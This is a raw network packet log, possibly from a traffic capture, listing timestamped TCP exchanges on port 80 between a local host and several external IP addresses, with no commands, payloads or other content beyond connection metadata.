                                                                      Jan 8, 2025 16:13:37.453680992 CET8049820202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:37.453725100 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:37.453814983 CET8049820202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:37.453865051 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:38.011255026 CET4982080192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:39.030426025 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:39.035268068 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.037736893 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:39.052648067 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:39.057615042 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057629108 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057638884 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057648897 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057670116 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057684898 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057707071 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057718039 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:39.057729006 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:40.001337051 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:40.001355886 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:40.001386881 CET8049838202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:40.001405001 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:40.001441956 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:40.558235884 CET4983880192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:41.576761007 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:41.581572056 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:41.581667900 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:41.590441942 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:41.595235109 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:42.553694963 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:42.553709984 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:42.553771019 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:42.553843975 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:42.553883076 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:42.556395054 CET4985480192.168.2.4202.92.5.23
                                                                      Jan 8, 2025 16:13:42.561220884 CET8049854202.92.5.23192.168.2.4
                                                                      Jan 8, 2025 16:13:47.728051901 CET4989580192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:47.732875109 CET8049895194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:47.732953072 CET4989580192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:47.747335911 CET4989580192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:47.752130985 CET8049895194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:48.248037100 CET8049895194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:48.248086929 CET8049895194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:48.248147964 CET4989580192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:49.261240005 CET4989580192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:50.279730082 CET4991180192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:50.284488916 CET8049911194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:50.284651995 CET4991180192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:50.300302982 CET4991180192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:50.305162907 CET8049911194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:50.819744110 CET8049911194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:50.819933891 CET8049911194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:50.823965073 CET4991180192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:51.808140993 CET4991180192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:52.826668024 CET4992780192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:52.831727028 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.833767891 CET4992780192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:52.848522902 CET4992780192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:52.853993893 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854003906 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854016066 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854029894 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854038000 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854046106 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854057074 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854064941 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:52.854074955 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:53.346621990 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:53.346697092 CET8049927194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:53.346740007 CET4992780192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:54.359330893 CET4992780192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.373720884 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.378484964 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:55.381774902 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.390995979 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.396708965 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:55.916239977 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:55.916256905 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:55.916392088 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.916908026 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:13:55.916961908 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.919069052 CET4994680192.168.2.4194.195.220.41
                                                                      Jan 8, 2025 16:13:55.923810005 CET8049946194.195.220.41192.168.2.4
                                                                      Jan 8, 2025 16:14:01.814477921 CET4998180192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:01.819271088 CET8049981103.230.159.86192.168.2.4
                                                                      Jan 8, 2025 16:14:01.820139885 CET4998180192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:01.834741116 CET4998180192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:01.839538097 CET8049981103.230.159.86192.168.2.4
                                                                      Jan 8, 2025 16:14:02.727698088 CET8049981103.230.159.86192.168.2.4
                                                                      Jan 8, 2025 16:14:02.727905035 CET8049981103.230.159.86192.168.2.4
                                                                      Jan 8, 2025 16:14:02.727958918 CET4998180192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:03.344420910 CET4998180192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:04.358150005 CET4999980192.168.2.4103.230.159.86
                                                                      Jan 8, 2025 16:14:04.362931967 CET8049999103.230.159.86192.168.2.4
Jan 8, 2025 16:14:04.363009930 CET  49999  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:04.378077030 CET  49999  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:04.382831097 CET  80  49999  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:05.235606909 CET  80  49999  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:05.235795021 CET  80  49999  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:05.236870050 CET  49999  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:05.886301041 CET  49999  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:06.905467987 CET  50016  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:06.911133051 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.911199093 CET  50016  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:06.925929070 CET  50016  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:06.931602955 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931726933 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931735992 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931740046 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931742907 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931751013 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931865931 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931874037 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:06.931881905 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:08.022977114 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:08.023436069 CET  80  50016  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:08.023488998 CET  50016  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:08.433229923 CET  50016  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:09.458194017 CET  50022  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:09.462971926 CET  80  50022  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:09.463052988 CET  50022  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:09.473546982 CET  50022  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:09.478367090 CET  80  50022  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:10.348237038 CET  80  50022  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:10.348251104 CET  80  50022  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:10.348383904 CET  50022  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:10.350898027 CET  50022  80  192.168.2.4  103.230.159.86
Jan 8, 2025 16:14:10.355623960 CET  80  50022  103.230.159.86  192.168.2.4
Jan 8, 2025 16:14:15.380441904 CET  50023  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:15.385211945 CET  80  50023  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:15.385296106 CET  50023  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:15.400223017 CET  50023  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:15.404999971 CET  80  50023  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:16.026437044 CET  80  50023  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:16.026834011 CET  80  50023  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:16.026896954 CET  80  50023  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:16.027012110 CET  50023  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:16.902034998 CET  50023  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:17.920819044 CET  50024  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:17.925628901 CET  80  50024  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:17.925704002 CET  50024  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:17.941776991 CET  50024  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:17.946518898 CET  80  50024  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:18.610270977 CET  80  50024  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:18.610944033 CET  80  50024  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:18.611001968 CET  50024  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:19.448844910 CET  50024  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:20.697024107 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:20.701936007 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.702024937 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:20.734805107 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:20.739713907 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739725113 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739836931 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739846945 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739856958 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739947081 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.739954948 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.740029097 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:20.740046024 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:21.386797905 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:21.387602091 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:21.387634993 CET  80  50025  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:21.387696981 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:21.387743950 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:22.245918036 CET  50025  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:23.338278055 CET  50026  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:23.343785048 CET  80  50026  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:23.343851089 CET  50026  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:23.413286924 CET  50026  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:23.418101072 CET  80  50026  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:24.015753031 CET  80  50026  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:24.016056061 CET  80  50026  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:24.016119003 CET  50026  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:24.018476963 CET  50026  80  192.168.2.4  188.114.97.3
Jan 8, 2025 16:14:24.023236036 CET  80  50026  188.114.97.3  192.168.2.4
Jan 8, 2025 16:14:29.476409912 CET  50027  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:29.481292963 CET  80  50027  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:29.481355906 CET  50027  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:29.541709900 CET  50027  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:29.546559095 CET  80  50027  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:30.383698940 CET  80  50027  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:30.383790016 CET  80  50027  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:30.383852959 CET  50027  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:31.073848009 CET  50027  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:32.093039989 CET  50028  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:32.098067045 CET  80  50028  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:32.098160028 CET  50028  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:32.123348951 CET  50028  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:32.128348112 CET  80  50028  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:32.991274118 CET  80  50028  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:32.991388083 CET  80  50028  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:32.991447926 CET  50028  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:33.637578964 CET  50028  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:34.662065983 CET  50029  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:34.666918993 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.667013884 CET  50029  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:34.693032980 CET  50029  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:34.697864056 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698062897 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698075056 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698093891 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698105097 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698113918 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698123932 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698143005 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:34.698153019 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:35.548619986 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:35.548847914 CET  80  50029  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:35.548902988 CET  50029  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:36.198887110 CET  50029  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:37.224225998 CET  50030  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:37.230508089 CET  80  50030  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:37.230596066 CET  50030  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:37.241071939 CET  50030  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:37.248251915 CET  80  50030  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:38.111676931 CET  80  50030  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:38.111901999 CET  80  50030  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:38.111978054 CET  50030  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:38.114373922 CET  50030  80  192.168.2.4  118.107.250.103
Jan 8, 2025 16:14:38.119154930 CET  80  50030  118.107.250.103  192.168.2.4
Jan 8, 2025 16:14:43.143122911 CET  50031  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:43.147995949 CET  80  50031  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:43.148083925 CET  50031  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:43.174268961 CET  50031  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:43.179091930 CET  80  50031  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:43.772525072 CET  80  50031  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:43.777520895 CET  80  50031  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:43.777584076 CET  50031  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:44.683636904 CET  50031  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:45.708126068 CET  50032  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:45.713012934 CET  80  50032  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:45.713215113 CET  50032  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:45.727068901 CET  50032  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:45.731839895 CET  80  50032  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:46.301549911 CET  80  50032  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:46.301588058 CET  80  50032  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:46.301778078 CET  50032  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:47.230376959 CET  50032  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:48.249119997 CET  50033  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:48.254049063 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.254182100 CET  50033  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:48.268421888 CET  50033  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:48.273405075 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273417950 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273437977 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273446083 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273454905 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273463964 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273484945 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273492098 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.273500919 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.865330935 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.865354061 CET  80  50033  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:48.865463018 CET  50033  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:49.777137041 CET  50033  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:50.795654058 CET  50034  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:50.800551891 CET  80  50034  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:50.800633907 CET  50034  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:50.809536934 CET  50034  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:50.814336061 CET  80  50034  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:51.423418045 CET  80  50034  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:51.423443079 CET  80  50034  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:51.423595905 CET  50034  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:51.426136017 CET  50034  80  192.168.2.4  209.74.77.109
Jan 8, 2025 16:14:51.430931091 CET  80  50034  209.74.77.109  192.168.2.4
Jan 8, 2025 16:14:56.457731009 CET  50035  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:56.464551926 CET  80  50035  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:56.464612007 CET  50035  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:56.479806900 CET  50035  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:56.486465931 CET  80  50035  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:57.187223911 CET  80  50035  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:57.187900066 CET  80  50035  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:57.187963009 CET  50035  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:57.995882034 CET  50035  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:59.028225899 CET  50036  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:59.033307076 CET  80  50036  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:59.033395052 CET  50036  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:59.051595926 CET  50036  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:14:59.056421041 CET  80  50036  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:59.748958111 CET  80  50036  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:59.749366045 CET  80  50036  188.114.96.3  192.168.2.4
Jan 8, 2025 16:14:59.749418020 CET  50036  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:00.558366060 CET  50036  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:01.578138113 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:01.583018064 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.583103895 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:01.604249954 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:01.609097004 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609106064 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609144926 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609153032 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609162092 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609255075 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609262943 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609283924 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:01.609304905 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:02.352977037 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:02.354298115 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:02.354357958 CET  80  50037  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:02.354360104 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:02.354402065 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:03.120903015 CET  50037  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.139431953 CET  50038  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.144315958 CET  80  50038  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:04.144435883 CET  50038  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.154334068 CET  50038  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.159085989 CET  80  50038  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:04.892368078 CET  80  50038  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:04.892421961 CET  80  50038  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:04.892532110 CET  50038  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.917772055 CET  50038  80  192.168.2.4  188.114.96.3
Jan 8, 2025 16:15:04.922537088 CET  80  50038  188.114.96.3  192.168.2.4
Jan 8, 2025 16:15:09.968262911 CET  50039  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:09.973047972 CET  80  50039  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:09.973134041 CET  50039  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:09.992022991 CET  50039  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:09.996846914 CET  80  50039  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:10.616898060 CET  80  50039  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:10.618568897 CET  80  50039  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:10.618642092 CET  50039  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:11.495819092 CET  50039  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:12.514184952 CET  50040  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:12.519059896 CET  80  50040  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:12.519141912 CET  50040  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:12.533767939 CET  50040  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:12.538635015 CET  80  50040  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:13.142661095 CET  80  50040  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:13.142874956 CET  80  50040  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:13.142927885 CET  50040  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:14.042752028 CET  50040  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:15.061258078 CET  50041  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:15.067405939 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.069873095 CET  50041  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:15.084863901 CET  50041  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:15.090908051 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.090918064 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091012001 CET  80  50041  194.245.148.189  192.168.2.4
